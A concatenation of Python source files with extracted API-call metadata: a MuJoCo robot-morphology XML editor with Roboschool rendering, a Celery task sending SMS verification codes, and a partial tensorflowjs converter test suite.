(['event_vc_room'], {}), '(event_vc_room)\n', (8472, 8487), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((8853, 8864), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (8862, 8864), False, 'from unittest.mock import MagicMock\n'), ((8916, 8944), 'unittest.mock.MagicMock', 'MagicMock', ([], {'return_value': '(True)'}), '(return_value=True)\n', (8925, 8944), False, 'from unittest.mock import MagicMock\n'), ((9102, 9127), 'indico_ravem.util.has_access', 'has_access', (['event_vc_room'], {}), '(event_vc_room)\n', (9112, 9127), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((4880, 4902), 'pytest.raises', 'pytest.raises', (['Timeout'], {}), '(Timeout)\n', (4893, 4902), False, 'import pytest\n'), ((4923, 4954), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['"""test_endpoint"""'], {}), "('test_endpoint')\n", (4937, 4954), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((5557, 5582), 'pytest.raises', 'pytest.raises', (['IndexError'], {}), '(IndexError)\n', (5570, 5582), False, 'import pytest\n'), ((5603, 5659), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['"""test_endpoint"""'], {'method': 'method'}), "('test_endpoint', method=method, **params)\n", (5617, 5659), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((6485, 6525), 'indico_ravem.plugin.RavemPlugin.settings.get', 'RavemPlugin.settings.get', (['"""api_endpoint"""'], {}), "('api_endpoint')\n", (6509, 6525), False, 'from indico_ravem.plugin import RavemPlugin\n'), ((6771, 6795), 'pytest.raises', 'pytest.raises', (['HTTPError'], {}), '(HTTPError)\n', (6784, 6795), False, 'import pytest\n'), ((6816, 6872), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (['"""test_endpoint"""'], {'method': 'method'}), "('test_endpoint', method=method, **params)\n", (6830, 6872), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((7377, 7402), 'indico_ravem.util.has_access', 'has_access', (['event_vc_room'], {}), '(event_vc_room)\n', (7387, 7402), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((7676, 7701), 'indico_ravem.util.has_access', 'has_access', (['event_vc_room'], {}), '(event_vc_room)\n', (7686, 7701), False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((7085, 7125), 'indico_ravem.plugin.RavemPlugin.settings.get', 'RavemPlugin.settings.get', (['"""api_endpoint"""'], {}), "('api_endpoint')\n", (7109, 7125), False, 'from indico_ravem.plugin import RavemPlugin\n')] |
import numpy as np
import xml.etree.ElementTree as ET
class Geom(object):
def __init__(self, geom):
self.xml = geom
self.params = []
def get_params(self):
return self.params.copy()
def set_params(self, new_params):
self.params = new_params
def update_point(self, p, new_params):
pass
def update_xml(self):
pass
def update(self, new_params):
self.set_params(new_params)
self.update_xml()
def get_smallest_z(self):
pass
def get_param_limits(self):
pass
def get_param_names(self):
pass
def get_volume(self):
pass
class Sphere(Geom):
min_radius = .05
max_radius = .4
def __init__(self, geom):
self.xml = geom
self.params = [float(self.xml.get('size'))] # radius
self.center = np.array([float(x) for x in self.xml.get('pos').split()])
def update_point(self, p, new_params):
return ((p - self.center) * new_params[0] / self.params[0]) + self.center
def update_xml(self):
self.xml.set('size', str(self.params[0]))
def get_smallest_z(self):
return self.center[2] - self.params[0]
def get_param_limits(self):
return [[self.min_radius], [self.max_radius]]
def get_param_names(self):
return ['radius']
def get_volume(self):
return 4./3. * np.pi * self.params[0] ** 3
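# Quick check of Sphere.update_point(): offsets from the center are scaled by
# the ratio of radii, so a surface point stays on the new surface. With the
# center at the origin and radius r, p = [r, 0, 0] maps to [new_r, 0, 0].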
class Capsule(Geom):
min_length = 0.175
max_length = 0.8
min_radius = 0.035
max_radius = 0.085
def __init__(self, geom):
self.xml = geom
fromto = [float(x) for x in self.xml.get('fromto').split()]
self.p1 = np.array(fromto[:3])
self.p2 = np.array(fromto[3:])
length = np.sqrt(np.sum((self.p2 - self.p1) ** 2))
radius = float(self.xml.get('size'))
self.params = [length, radius]
self.axis = (self.p2 - self.p1) / length
def update_point(self, p, new_params):
lfac = p.dot(self.axis) * self.axis
rfac = p - lfac
return p + lfac * (-1.0 + new_params[0] / self.params[0])# + rfac * (new_params[1] / self.params[1])
def update_xml(self):
self.xml.set('fromto', ' '.join([str(x) for x in np.concatenate([self.p1, self.p2])]))
self.xml.set('size', str(self.params[1])) # radius
def set_params(self, new_params):
p1 = self.update_point(self.p1, new_params)
p2 = self.update_point(self.p2, new_params)
# update only after computing p1, p2
self.p1 = p1
self.p2 = p2
super().set_params(new_params)
def get_smallest_z(self):
return min(self.p1[2], self.p2[2]) - self.params[1]
def get_param_limits(self):
return [[self.min_length, self.min_radius], [self.max_length, self.max_radius]]
def get_param_names(self):
return ['length','radius']
def get_volume(self):
return 4./3. * np.pi * self.params[1]**3 + self.params[0] * np.pi * self.params[1]**2
class Body:
geoms = {'sphere': Sphere, 'capsule': Capsule} # dictionary of legal geometry types
def __init__(self, body, worldbody=False):
self.xml = body
self.worldbody = worldbody
geom_xml = body.find('geom') # assume only one geometry per body
self.geom = self.geoms[geom_xml.get('type')](geom_xml)
self.joints = [j for j in body.findall('joint') if 'ignore' not in j.get('name')]
self.parts = [Body(b) for b in body.findall('body')]
pos = [b.get('pos') for b in body.findall('body')]
self.part_positions = [np.array([float(x) for x in p.split()]) for p in pos]
pos = [j.get('pos') for j in self.joints]
self.joint_positions = [np.array([float(x) for x in p.split()]) for p in pos]
self.n = len(self.geom.get_params())
self.n_all_params = len(self.get_params())
self.zmin = float(self.xml.get("pos").split()[2]) - self.get_height()
def get_height(self):
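        # Depth of the lowest geom point in this body's subtree, measured downward from this body's frame.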
max_height = -self.geom.get_smallest_z()
for body, pos in zip(self.parts, self.part_positions):
max_height = max(max_height, body.get_height() - pos[2])
return max_height
def update_initial_position(self):
pos = self.xml.get("pos").split()
pos[2] = str(self.get_height() + self.zmin)
self.xml.set("pos", ' '.join(pos))
def update_xml(self):
for body, pos in zip(self.parts, self.part_positions):
body.xml.set('pos', ' '.join([str(x) for x in pos]))
for joint, pos in zip(self.joints, self.joint_positions):
joint.set('pos', ' '.join([str(x) for x in pos]))
def set_body_positions(self, new_params):
for i, pos in enumerate(self.part_positions):
self.part_positions[i] = self.geom.update_point(pos, new_params)
for i, pos in enumerate(self.joint_positions):
self.joint_positions[i] = self.geom.update_point(pos, new_params)
def update(self, new_params):
self.set_body_positions(new_params)
self.geom.update(new_params)
self.update_xml()
def get_params(self):
params = self.geom.get_params()
for body in self.parts:
params += body.get_params()
return params
def get_param_limits(self):
limits = self.geom.get_param_limits()
for body in self.parts:
body_limits = body.get_param_limits()
limits[0] += body_limits[0]
limits[1] += body_limits[1]
return limits
def get_param_names(self):
name = self.xml.get('name')
param_names = [name + '-' + p for p in self.geom.get_param_names()]
for body in self.parts:
param_names += body.get_param_names()
return param_names
def update_params(self, new_params):
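        # Consume this body's geometry parameters first, then pass the remainder to child bodies depth-first.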
if self.worldbody: assert len(new_params) == self.n_all_params, "Wrong number of parameters"
self.update(new_params[:self.n])
remaining_params = new_params[self.n:]
for body in self.parts:
remaining_params = body.update_params(remaining_params)
if self.worldbody:
self.update_initial_position()
else:
return remaining_params
def get_body_names(self):
names = [self.xml.get('name')]
for body in self.parts:
            names += body.get_body_names()
return names
def get_joints(self):
joints = {}
for body,pos in zip(self.parts, self.part_positions):
for j in body.joints:
joints[j.get('name')] = (self.xml.get('name'), body.xml.get('name'), self.geom, body.geom, pos)
joints.update(body.get_joints())
return joints
def get_volumes(self):
volumes = {}
if len(self.joints) > 0:
for j in self.joints:
v1 = self.geom.get_volume()
v2 = sum([b.geom.get_volume() for b in self.parts])
volumes[j.get('name')] = np.array((v1, v2))
for body in self.parts:
volumes.update(body.get_volumes())
return volumes
class MuJoCoXmlRobot:
def __init__(self, model_xml):
self.model_xml = model_xml
self.tree = ET.parse(self.model_xml)
worldbody = self.tree.getroot().find('worldbody')
self.body = Body(worldbody.find('body'), worldbody=True)
def get_params(self):
return self.body.get_params()
def get_param_limits(self):
return self.body.get_param_limits()
def get_param_names(self):
return self.body.get_param_names()
def get_height(self):
return self.body.get_height()
def get_joints(self):
return self.body.get_joints()
def get_volumes(self):
return self.body.get_volumes()
def update(self, params, xml_file=None):
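        # Apply a full parameter vector to the robot and write the resulting MJCF XML to disk.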
if xml_file is None:
xml_file = self.model_xml
self.body.update_params(list(params))
self.tree.write(xml_file)
if __name__ == '__main__':
robot = MuJoCoXmlRobot('mujoco_assets/hopper.xml')
params = list(1.0 * np.array(robot.get_params()))
robot.update(params, 'mujoco_assets/hopper_test.xml')
assert robot.get_params() == params
#assert robot.get_height() == 1.31
print(robot.get_param_limits())
print(robot.get_param_names())
robot = MuJoCoXmlRobot('mujoco_assets/walker2d.xml')
params = [.4,.04,.5,.05,.55,.055,.6,.06,.5,.05,.55,.055,.6,.06]
robot.update(params, 'mujoco_assets/walker2d_test.xml')
assert robot.get_params() == params
assert robot.get_height() == 1.31
print(robot.get_param_limits())
print(robot.get_param_names())
robot = MuJoCoXmlRobot('mujoco_assets/ant.xml')
params = [.2, .2,.06,.2,.06,.4,.06, .2,.06,.2,.06,.4,.06, .2,.06,.2,.06,.4,.06, .2,.06,.2,.06,.4,.06]
robot.update(params, 'mujoco_assets/ant_test.xml')
assert robot.get_params() == params
assert robot.get_height() == .2
print(robot.get_param_limits())
print(robot.get_param_names())
robot = MuJoCoXmlRobot('mujoco_assets/humanoid.xml')
params = list(.8 * np.array(robot.get_params()))
robot.update(params, 'mujoco_assets/humanoid_test.xml')
assert robot.get_params() == params
print(robot.get_height())
#assert robot.get_height() == .6085
print(robot.get_param_limits())
print(robot.get_param_names())
import gym, roboschool
env = gym.make("RoboschoolHopper-v1")
env.unwrapped.model_xml = 'mujoco_assets/hopper_test.xml'
env.reset()
#env.render()
import os
from scipy.misc import imsave
import subprocess as sp
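    # Roll out random actions, dump each rendered frame as a PNG, then stitch the frames into a video with ffmpeg.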
outdir = 'xml_vid'
os.makedirs(outdir, exist_ok=True)
i = 0
for _ in range(10):
env.reset()
for _ in range(100):
env.step(env.action_space.sample())
rgb = env.render('rgb_array')
imsave(os.path.join(outdir, '{:05d}.png'.format(i)), rgb)
            i += 1
sp.call(['ffmpeg', '-r', '60', '-f', 'image2', '-i', os.path.join(outdir, '%05d.png'), '-vcodec', 'libx264', '-pix_fmt', 'yuv420p', os.path.join(outdir, 'out.mp4')])
env.close()
| [
"xml.etree.ElementTree.parse",
"os.makedirs",
"os.path.join",
"numpy.sum",
"numpy.array",
"numpy.concatenate",
"gym.make"
] | [((9394, 9425), 'gym.make', 'gym.make', (['"""RoboschoolHopper-v1"""'], {}), "('RoboschoolHopper-v1')\n", (9402, 9425), False, 'import gym, roboschool\n'), ((9625, 9659), 'os.makedirs', 'os.makedirs', (['outdir'], {'exist_ok': '(True)'}), '(outdir, exist_ok=True)\n', (9636, 9659), False, 'import os\n'), ((1671, 1691), 'numpy.array', 'np.array', (['fromto[:3]'], {}), '(fromto[:3])\n', (1679, 1691), True, 'import numpy as np\n'), ((1710, 1730), 'numpy.array', 'np.array', (['fromto[3:]'], {}), '(fromto[3:])\n', (1718, 1730), True, 'import numpy as np\n'), ((7208, 7232), 'xml.etree.ElementTree.parse', 'ET.parse', (['self.model_xml'], {}), '(self.model_xml)\n', (7216, 7232), True, 'import xml.etree.ElementTree as ET\n'), ((1756, 1788), 'numpy.sum', 'np.sum', (['((self.p2 - self.p1) ** 2)'], {}), '((self.p2 - self.p1) ** 2)\n', (1762, 1788), True, 'import numpy as np\n'), ((9977, 10009), 'os.path.join', 'os.path.join', (['outdir', '"""%05d.png"""'], {}), "(outdir, '%05d.png')\n", (9989, 10009), False, 'import os\n'), ((10056, 10087), 'os.path.join', 'os.path.join', (['outdir', '"""out.mp4"""'], {}), "(outdir, 'out.mp4')\n", (10068, 10087), False, 'import os\n'), ((6973, 6991), 'numpy.array', 'np.array', (['(v1, v2)'], {}), '((v1, v2))\n', (6981, 6991), True, 'import numpy as np\n'), ((2228, 2262), 'numpy.concatenate', 'np.concatenate', (['[self.p1, self.p2]'], {}), '([self.p1, self.p2])\n', (2242, 2262), True, 'import numpy as np\n')] |
from ronglian_sms_sdk import SmsSDK
from celery_tasks.main import app
# Define our task (function).
# A task must be decorated with the Celery app instance's task decorator.
# Tasks inside the task package are picked up by Celery's autodiscovery (configured in main).
@app.task
def celery_send_sms_code(mobile, sms_code):
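    # Typically invoked asynchronously from the web app, e.g. celery_send_sms_code.delay(mobile, sms_code).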
accId = '<KEY>'
accToken = '514a8783b8c2481ebbeb6a814434796f'
appId = '<KEY>'
    # 9.1. Create the Ronglian Cloud SMS SDK instance.
sdk = SmsSDK(accId, accToken, appId)
    tid = '1' # The SMS template to use; the value can only be 1 because we are a test account.
    mobile = '%s' % mobile # 'phone1,phone2': the phone numbers that receive the code; only test numbers are allowed.
    datas = (sms_code, 10) # ('variable 1', 'variable 2'): the variables substituted into the template.
    # Template: "Your verification code is {1}, please enter it within {2} minutes."
    # e.g. "Your verification code is 666999, please enter it within 5 minutes."
    # 9.2. Send the SMS.
sdk.sendMessage(tid, mobile, datas) | [
"ronglian_sms_sdk.SmsSDK"
] | [((326, 356), 'ronglian_sms_sdk.SmsSDK', 'SmsSDK', (['accId', 'accToken', 'appId'], {}), '(accId, accToken, appId)\n', (332, 356), False, 'from ronglian_sms_sdk import SmsSDK\n')] |
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test the Python API and shell binary of the tensorflowjs pip package."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import glob
import json
import os
import shutil
import subprocess
import sys
import tempfile
import unittest
import numpy as np
import tensorflow as tf
from tensorflow import keras
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import tensor_spec
from tensorflow.python.ops import variables
from tensorflow.python.training.tracking import tracking
from tensorflow.python.saved_model.save import save
import tensorflow_hub as hub
import tensorflowjs as tfjs
def _createKerasModel(layer_name_prefix, h5_path=None):
"""Create a Keras model for testing.
Args:
layer_name_prefix: A prefix string for layer names. This helps avoid
clashes in layer names between different test methods.
h5_path: Optional string path for a HDF5 (.h5) file to save the model
in.
Returns:
An instance of keras.Model.
"""
input_tensor = keras.layers.Input((3, ))
dense1 = keras.layers.Dense(
4,
use_bias=True,
kernel_initializer='ones',
bias_initializer='zeros',
name=layer_name_prefix + '1')(input_tensor)
output = keras.layers.Dense(
2,
use_bias=False,
kernel_initializer='ones',
name=layer_name_prefix + '2')(dense1)
model = keras.models.Model(inputs=[input_tensor], outputs=[output])
if h5_path:
model.save(h5_path)
return model
def _createTensorFlowSavedModelV1(name_scope, save_path):
"""Create a TensorFlow SavedModel for testing.
Args:
name_scope: Name scope to create the model under. This helps avoid
op and variable name clashes between different test methods.
save_path: The directory path in which to save the model.
"""
graph = tf.Graph()
with graph.as_default():
with tf.compat.v1.name_scope(name_scope):
x = tf.compat.v1.constant([[37.0, -23.0], [1.0, 4.0]])
w = tf.compat.v1.get_variable('w', shape=[2, 2])
y = tf.compat.v1.matmul(x, w)
output = tf.compat.v1.nn.softmax(y)
init_op = w.initializer
# Create a builder.
builder = tf.compat.v1.saved_model.builder.SavedModelBuilder(save_path)
with tf.compat.v1.Session() as sess:
# Run the initializer on `w`.
sess.run(init_op)
builder.add_meta_graph_and_variables(
sess, [tf.compat.v1.saved_model.tag_constants.SERVING],
signature_def_map={
"serving_default":
tf.compat.v1.saved_model.signature_def_utils.predict_signature_def(
inputs={"x": x},
outputs={"output": output})
},
assets_collection=None)
builder.save()
def _createTensorFlowSavedModel(name_scope, save_path):
"""Create a TensorFlow SavedModel for testing.
Args:
name_scope: Name scope to create the model under. This helps avoid
op and variable name clashes between different test methods.
save_path: The directory path in which to save the model.
"""
input_data = constant_op.constant(1., shape=[1])
root = tracking.AutoTrackable()
root.v1 = variables.Variable(3.)
root.v2 = variables.Variable(2.)
root.f = def_function.function(lambda x: root.v1 * root.v2 * x)
to_save = root.f.get_concrete_function(input_data)
save(root, save_path, to_save)
def _create_hub_module(save_path):
"""Create a TensorFlow Hub module for testing.
Args:
save_path: The directory path in which to save the model.
"""
# Module function that doubles its input.
def double_module_fn():
w = tf.Variable([2.0, 4.0])
x = tf.compat.v1.placeholder(dtype=tf.float32)
hub.add_signature(inputs=x, outputs=x*w)
graph = tf.Graph()
with graph.as_default():
spec = hub.create_module_spec(double_module_fn)
m = hub.Module(spec)
# Export the module.
with tf.compat.v1.Session(graph=graph) as sess:
sess.run(tf.compat.v1.global_variables_initializer())
m.export(save_path, sess)
class APIAndShellTest(tf.test.TestCase):
"""Tests for the Python API of the pip package."""
@classmethod
def setUpClass(cls):
cls.class_tmp_dir = tempfile.mkdtemp()
cls.tf_saved_model_dir = os.path.join(cls.class_tmp_dir, 'tf_saved_model')
cls.tf_saved_model_v1_dir = os.path.join(
cls.class_tmp_dir, 'tf_saved_model_v1')
_createTensorFlowSavedModel('a', cls.tf_saved_model_dir)
_createTensorFlowSavedModelV1('b', cls.tf_saved_model_v1_dir)
cls.tf_hub_module_dir = os.path.join(cls.class_tmp_dir, 'tf_hub_module')
_create_hub_module(cls.tf_hub_module_dir)
@classmethod
def tearDownClass(cls):
shutil.rmtree(cls.class_tmp_dir)
def setUp(self):
# Make sure this file is not being run from the source directory, to
# avoid picking up source files.
if os.path.isdir(
os.path.join(os.path.dirname(__file__), 'tensorflowjs')):
self.fail('Do not run this test from the Python source directory. '
'This file is intended to be run on pip install.')
self._tmp_dir = tempfile.mkdtemp()
super(APIAndShellTest, self).setUp()
def tearDown(self):
if os.path.isdir(self._tmp_dir):
shutil.rmtree(self._tmp_dir)
super(APIAndShellTest, self).tearDown()
def testVersionString(self):
self.assertEqual(2, tfjs.__version__.count('.'))
def testSaveKerasModel(self):
with self.test_session():
# First create a toy keras model.
model = _createKerasModel('MergedDense')
tfjs.converters.save_keras_model(model, self._tmp_dir)
# Briefly check the model topology.
with open(os.path.join(self._tmp_dir, 'model.json')) as f:
json_content = json.load(f)
model_json = json_content['modelTopology']
self.assertIsInstance(model_json['model_config'], dict)
self.assertIsInstance(model_json['model_config']['config'], dict)
self.assertIn('layers', model_json['model_config']['config'])
weights_manifest = json_content['weightsManifest']
self.assertIsInstance(weights_manifest, list)
# Briefly check the weights manifest.
weight_shapes = dict()
weight_dtypes = dict()
for manifest_item in weights_manifest:
for weight in manifest_item['weights']:
weight_name = weight['name']
weight_shapes[weight_name] = weight['shape']
weight_dtypes[weight_name] = weight['dtype']
self.assertEqual(
sorted(list(weight_shapes.keys())),
sorted([
'MergedDense1/kernel', 'MergedDense1/bias',
'MergedDense2/kernel'
]))
self.assertEqual(weight_shapes['MergedDense1/kernel'], [3, 4])
self.assertEqual(weight_shapes['MergedDense1/bias'], [4])
self.assertEqual(weight_shapes['MergedDense2/kernel'], [4, 2])
self.assertEqual(weight_dtypes['MergedDense1/kernel'], 'float32')
self.assertEqual(weight_dtypes['MergedDense1/bias'], 'float32')
self.assertEqual(weight_dtypes['MergedDense2/kernel'], 'float32')
def testLoadKerasModel(self):
# Use separate tf.Graph and tf.compat.v1.Session contexts to prevent name collision.
with tf.Graph().as_default(), tf.compat.v1.Session():
# First create a toy keras model.
model1 = _createKerasModel('MergedDense')
tfjs.converters.save_keras_model(model1, self._tmp_dir)
model1_weight_values = model1.get_weights()
with tf.Graph().as_default(), tf.compat.v1.Session():
# Load the model from saved artifacts.
model2 = tfjs.converters.load_keras_model(
os.path.join(self._tmp_dir, 'model.json'))
# Compare the loaded model with the original one.
model2_weight_values = model2.get_weights()
self.assertEqual(len(model1_weight_values), len(model2_weight_values))
for model1_weight_value, model2_weight_value in zip(
model1_weight_values, model2_weight_values):
self.assertAllClose(model1_weight_value, model2_weight_value)
# Check the content of the output directory.
self.assertTrue(glob.glob(os.path.join(self._tmp_dir, 'group*-*')))
def testInvalidInputFormatRaisesError(self):
process = subprocess.Popen(
[
'tensorflowjs_converter', '--input_format',
'nonsensical_format', self._tmp_dir, self._tmp_dir
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
_, stderr = process.communicate()
self.assertGreater(process.returncode, 0)
self.assertIn(b'--input_format', tf.compat.as_bytes(stderr))
def testMissingInputPathRaisesError(self):
process = subprocess.Popen(
[
'tensorflowjs_converter'
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
_, stderr = process.communicate()
self.assertGreater(process.returncode, 0)
self.assertIn(b'input_path', tf.compat.as_bytes(stderr))
def testKerasH5ConversionWorksFromCLI(self):
with tf.Graph().as_default(), tf.compat.v1.Session():
# First create a toy keras model.
os.makedirs(os.path.join(self._tmp_dir, 'keras_h5'))
h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5')
_createKerasModel('MergedDenseForCLI', h5_path)
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras', h5_path,
self._tmp_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# Briefly check the model topology.
with open(os.path.join(self._tmp_dir, 'model.json'), 'rt') as f:
json_content = json.load(f)
model_json = json_content['modelTopology']
self.assertIsInstance(model_json['model_config'], dict)
self.assertIsInstance(model_json['model_config']['config'], dict)
self.assertIn('layers', model_json['model_config']['config'])
weights_manifest = json_content['weightsManifest']
self.assertIsInstance(weights_manifest, list)
# Briefly check the weights manifest.
weight_shapes = dict()
weight_dtypes = dict()
for manifest_item in weights_manifest:
for weight in manifest_item['weights']:
weight_name = weight['name']
weight_shapes[weight_name] = weight['shape']
weight_dtypes[weight_name] = weight['dtype']
self.assertEqual(
sorted(list(weight_shapes.keys())),
sorted([
'MergedDenseForCLI1/kernel', 'MergedDenseForCLI1/bias',
'MergedDenseForCLI2/kernel'
]))
self.assertEqual(weight_shapes['MergedDenseForCLI1/kernel'], [3, 4])
self.assertEqual(weight_shapes['MergedDenseForCLI1/bias'], [4])
self.assertEqual(weight_shapes['MergedDenseForCLI2/kernel'], [4, 2])
self.assertEqual(weight_dtypes['MergedDenseForCLI1/kernel'], 'float32')
self.assertEqual(weight_dtypes['MergedDenseForCLI1/bias'], 'float32')
self.assertEqual(weight_dtypes['MergedDenseForCLI2/kernel'], 'float32')
# Verify that there is only one weight group due to the default
# non-split_weights_by_layer behavior. The model is a small one, which
# does not exceed the 4-MB shard size limit. Therefore, there should
# be only one weight file.
self.assertEqual(
1, len(glob.glob(os.path.join(self._tmp_dir, 'group*'))))
def testKerasH5ConversionSplitWeightsByLayerWorksFromCLI(self):
with tf.Graph().as_default(), tf.compat.v1.Session():
# First create a toy keras model.
os.makedirs(os.path.join(self._tmp_dir, 'keras_h5'))
h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5')
_createKerasModel('MergedDenseForCLI', h5_path)
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras',
'--split_weights_by_layer', h5_path, self._tmp_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# Briefly check the model topology.
with open(os.path.join(self._tmp_dir, 'model.json'), 'rt') as f:
json_content = json.load(f)
model_json = json_content['modelTopology']
self.assertIsInstance(model_json['model_config'], dict)
self.assertIsInstance(model_json['model_config']['config'], dict)
self.assertIn('layers', model_json['model_config']['config'])
weights_manifest = json_content['weightsManifest']
self.assertIsInstance(weights_manifest, list)
# Briefly check the weights manifest.
weight_shapes = dict()
weight_dtypes = dict()
for manifest_item in weights_manifest:
for weight in manifest_item['weights']:
weight_name = weight['name']
weight_shapes[weight_name] = weight['shape']
weight_dtypes[weight_name] = weight['dtype']
self.assertEqual(
sorted(list(weight_shapes.keys())),
sorted([
'MergedDenseForCLI1/kernel', 'MergedDenseForCLI1/bias',
'MergedDenseForCLI2/kernel'
]))
self.assertEqual(weight_shapes['MergedDenseForCLI1/kernel'], [3, 4])
self.assertEqual(weight_shapes['MergedDenseForCLI1/bias'], [4])
self.assertEqual(weight_shapes['MergedDenseForCLI2/kernel'], [4, 2])
self.assertEqual(weight_dtypes['MergedDenseForCLI1/kernel'], 'float32')
self.assertEqual(weight_dtypes['MergedDenseForCLI1/bias'], 'float32')
self.assertEqual(weight_dtypes['MergedDenseForCLI2/kernel'], 'float32')
# Verify that there are two weight groups due to the optional flag
# --split_weights_by_layer behavior. The model is a small one. None of
# the layers should have weight sizes exceeding the 4-MB shard size
# limit.
self.assertEqual(
2, len(glob.glob(os.path.join(self._tmp_dir, 'group*'))))
def testKerasH5ConversionWithSignatureNameErrors(self):
process = subprocess.Popen(
[
'tensorflowjs_converter', '--input_format', 'keras',
'--signature_name', 'bar',
os.path.join(self._tmp_dir, 'foo.h5'),
os.path.join(self._tmp_dir, 'output')
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
_, stderr = process.communicate()
self.assertGreater(process.returncode, 0)
self.assertIn(
b'The --signature_name flag is applicable only to',
tf.compat.as_bytes(stderr))
def testConvertTFSavedModelV1WithCommandLineWorks(self):
output_dir = os.path.join(self._tmp_dir)
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tf_saved_model',
'--output_format', 'tfjs_graph_model',
self.tf_saved_model_v1_dir, output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
weights = [{
'paths': ['group1-shard1of1.bin'],
'weights': [{'dtype': 'float32', 'name': 'w', 'shape': [2, 2]}]}]
# Load the saved weights as a JSON string.
output_json = json.load(
open(os.path.join(output_dir, 'model.json'), 'rt'))
self.assertEqual(output_json['weightsManifest'], weights)
# Check the content of the output directory.
self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))
def testConvertTFHubModuleWithCommandLineWorks(self):
output_dir = os.path.join(self._tmp_dir)
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tf_hub',
self.tf_hub_module_dir, output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
weights = [{
'paths': ['group1-shard1of1.bin'],
'weights': [{
'shape': [2],
'name': 'module/Variable',
'dtype': 'float32'
}]
}]
# Load the saved weights as a JSON string.
output_json = json.load(
open(os.path.join(output_dir, 'model.json'), 'rt'))
self.assertEqual(output_json['weightsManifest'], weights)
# Check the content of the output directory.
self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))
def testConvertTFSavedModelWithCommandLineWorks(self):
output_dir = os.path.join(self._tmp_dir)
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tf_saved_model',
'--output_format', 'tfjs_graph_model',
self.tf_saved_model_dir, output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
weights = [{
'paths': ['group1-shard1of1.bin'],
'weights': [{
'dtype': 'float32',
'shape': [],
'name': 'StatefulPartitionedCall/mul'
}]
}]
# Load the saved weights as a JSON string.
output_json = json.load(
open(os.path.join(output_dir, 'model.json'), 'rt'))
weights_manifest = output_json['weightsManifest']
self.assertEqual(len(weights_manifest), len(weights))
if sys.version_info[0] < 3:
self.assertItemsEqual(weights_manifest[0]['paths'],
weights[0]['paths'])
self.assertItemsEqual(weights_manifest[0]['weights'],
weights[0]['weights'])
else:
self.assertCountEqual(weights_manifest[0]['paths'],
weights[0]['paths'])
self.assertCountEqual(weights_manifest[0]['weights'],
weights[0]['weights'])
# Check the content of the output directory.
self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))
def testConvertTFHubModuleWithCommandLineWorks(self):
output_dir = os.path.join(self._tmp_dir)
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tf_hub',
self.tf_hub_module_dir, output_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
weights = [{
'paths': ['group1-shard1of1.bin'],
'weights': [{
'shape': [2],
'name': 'module/Variable',
'dtype': 'float32'
}]
}]
# Load the saved weights as a JSON string.
output_json = json.load(
open(os.path.join(output_dir, 'model.json'), 'rt'))
self.assertEqual(output_json['weightsManifest'], weights)
# Check the content of the output directory.
self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))
def testConvertTensorflowjsArtifactsToKerasH5(self):
# 1. Create a toy keras model and save it as an HDF5 file.
os.makedirs(os.path.join(self._tmp_dir, 'keras_h5'))
h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5')
with tf.Graph().as_default(), tf.compat.v1.Session():
model = _createKerasModel('MergedDenseForCLI', h5_path)
model_json = model.to_json()
# 2. Convert the HDF5 file to tensorflowjs format.
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'keras', h5_path,
self._tmp_dir
])
process.communicate()
self.assertEqual(0, process.returncode)
# 3. Convert the tensorflowjs artifacts back to HDF5.
new_h5_path = os.path.join(self._tmp_dir, 'model_2.h5')
process = subprocess.Popen([
'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',
'--output_format', 'keras',
os.path.join(self._tmp_dir, 'model.json'), new_h5_path])
process.communicate()
self.assertEqual(0, process.returncode)
# 4. Load the model back from the new HDF5 file and compare with the
# original model.
with tf.Graph().as_default(), tf.compat.v1.Session():
model_2 = keras.models.load_model(new_h5_path)
model_2_json = model_2.to_json()
self.assertEqual(model_json, model_2_json)
def testLoadTensorflowjsArtifactsAsKerasModel(self):
# 1. Create a toy keras model and save it as an HDF5 file.
os.makedirs(os.path.join(self._tmp_dir, 'keras_h5'))
h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5')
with tf.Graph().as_default(), tf.compat.v1.Session():
model = _createKerasModel('MergedDenseForCLI', h5_path)
model_json = model.to_json()
